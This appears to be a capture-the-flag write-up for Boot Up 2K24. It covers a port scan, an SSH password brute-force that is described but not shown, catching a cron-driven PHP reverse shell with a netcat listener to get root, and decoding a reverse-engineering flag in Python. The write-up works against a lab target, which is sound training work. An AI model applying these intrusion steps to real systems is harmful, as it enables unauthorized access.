Bootup24
Detailed Write-up for Boot Up 2K24 CTF
---
layout: post
title: "Boot Up 2K24 CTF Writeup"
date: 2024-07-29
categories: [CTF, Security]
---
# Boot Up 2K24 CTF Writeup
## Task 1: SSH and User Flag
### Step 1.1: Nmap Scan
First, I performed an Nmap scan to identify open ports on the target machine:
![Nmap Scan Result](https://raw.githubusercontent.com/shemkumar/shemkumar.github.io/main/_posts/Screenshot%202024-07-29%20141448.png)
Here’s the result of the Nmap scan:
```plaintext
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-29 09:44 BST
Nmap scan report for ip-10-10-40-67.eu-west-1.compute.internal (10.10.40.67)
Host is up (0.00029s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
```
### Step 1.2: Brute-Forcing SSH Password
Based on the scan, I found that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP-Proxy) were open. I decided to brute-force the SSH password for the user `bootup24`.
After successfully brute-forcing the SSH password, I logged in and retrieved the first user flag:
```plaintext
root@ip-10-10-233-66:~# ssh bootup24@10.10.40.67
The authenticity of host '10.10.40.67 (10.10.40.67)' can't be established.
ECDSA key fingerprint is SHA256:IT1oaQY12jhOmyoQGZC1hKHtYUWy6i8rET2yKX0KkpI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.40.67' (ECDSA) to the list of known hosts.
bootup24@10.10.40.67's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bootup24@deathnote:~$ ls
flag.txt
bootup24@deathnote:~$ cat flag.txt
BootUp2k24{Falalalala!!!__D1dnt_G3t_anything_b3tter}
```
## Task 2: Cron Job and Root Flag
### Step 2.1: Identifying the Cron Job
Next, I checked for cron jobs and discovered a cron job running a PHP reverse shell. This cron job allowed me to gain a reverse shell on the target machine.
### Step 2.2: Using Netcat to Get the Root Flag
I used `nc` (netcat) to listen for incoming connections and get the reverse shell. Once connected, I was able to retrieve the root flag:
```plaintext
root@ip-10-10-233-66:~# nc -lnvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.40.67 56298 received!
sh: 0: can't access tty; job control turned off
$ ls
flag.txt
$ cat flag.txt
BootUp2k24{Cr0n_D0n3_R1ghT}
```
## Task 3: Reverse Engineering Challenge
### Step 3.1: Analyzing the Provided Code
The reverse engineering challenge provided the following array of hexadecimal values:
```c
int local_78 [26] = {0x84, 0x91, 0x9e, 0xa3, 0xa9, 0xa5, 0x82, 0x66, 0xaf, 0xb2, 0x9f, 0x9b, 0x92, 0x92, 0x9a, 0xce, 0xc6, 0xc2, 0xd5, 0xa6, 0x97, 0xce, 0x9e, 0x97, 0xe1};
```
### Step 3.2: Decoding the Magic Word
Using a simple Python script, I decoded the magic word by iterating over the array and applying the required transformations:
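```python
# Encoded values provided by the challenge
a = [0x84, 0x91, 0x9e, 0xa3, 0xa9, 0xa5, 0x82, 0x66, 0xaf, 0xb2, 0x9f, 0x9b, 0x92, 0x92, 0x9a, 0xce, 0xc6, 0xc2, 0xd5, 0xa6, 0x97, 0xce, 0x9e, 0x97, 0xe1]
# The value subtracted from the first element is ord('B')
minus = ord('B')
for i in a:
    # Subtract the previous decoded character to recover the current one
    print(chr(i-minus), end="")
    # The character just decoded is subtracted from the next element
    minus = i-minus
print("")
```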
### Step 3.3: Output of the Script
The script outputs the following magic word:
```plaintext
BOOTUP24{7h3_3gg_cr4ck3d}
```
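The decoding step from Task 3, restated as an added example (not part of the original write-up or the challenge's code): it wraps the recurrence in functions, adds the inverse encoder, and goes one step beyond the write-up by recovering the starting value from the known flag prefix. The function names and the encoder are assumptions inferred from the decoding script; the challenge binary's own logic is not shown on the page.

```python
# Added example: encoder/decoder pair for the chained-sum scheme, inferred from
# the write-up's decoding script (the challenge binary itself is not shown).

# Values copied from the write-up's array.
ENCODED = [0x84, 0x91, 0x9e, 0xa3, 0xa9, 0xa5, 0x82, 0x66, 0xaf, 0xb2, 0x9f, 0x9b, 0x92,
           0x92, 0x9a, 0xce, 0xc6, 0xc2, 0xd5, 0xa6, 0x97, 0xce, 0x9e, 0x97, 0xe1]


def decode(values, seed):
    """Recover code points: p[i] = v[i] - p[i-1], with p[-1] = seed."""
    prev, out = seed, []
    for v in values:
        prev = v - prev
        out.append(prev)
    return out


def encode(text, seed):
    """Assumed inverse of decode: v[i] = p[i] + p[i-1], with p[-1] = seed."""
    prev, out = seed, []
    for ch in text:
        out.append(ord(ch) + prev)
        prev = ord(ch)
    return out


def to_text(codes):
    """Render code points as a string, or None if any is not printable ASCII."""
    if all(0x20 <= c <= 0x7e for c in codes):
        return "".join(map(chr, codes))
    return None


def recover_seeds(values, known_prefix):
    """Try every byte seed; keep those whose output starts with known_prefix."""
    hits = []
    for seed in range(256):
        text = to_text(decode(values, seed))
        if text is not None and text.startswith(known_prefix):
            hits.append(seed)
    return hits


if __name__ == "__main__":
    print(to_text(decode(ENCODED, ord("B"))))
    print(recover_seeds(ENCODED, "BOOTUP24{"))
```

A wrong seed shifts every decoded character by the same offset with alternating sign, so the error never dies out and a known prefix pins the seed to a single value.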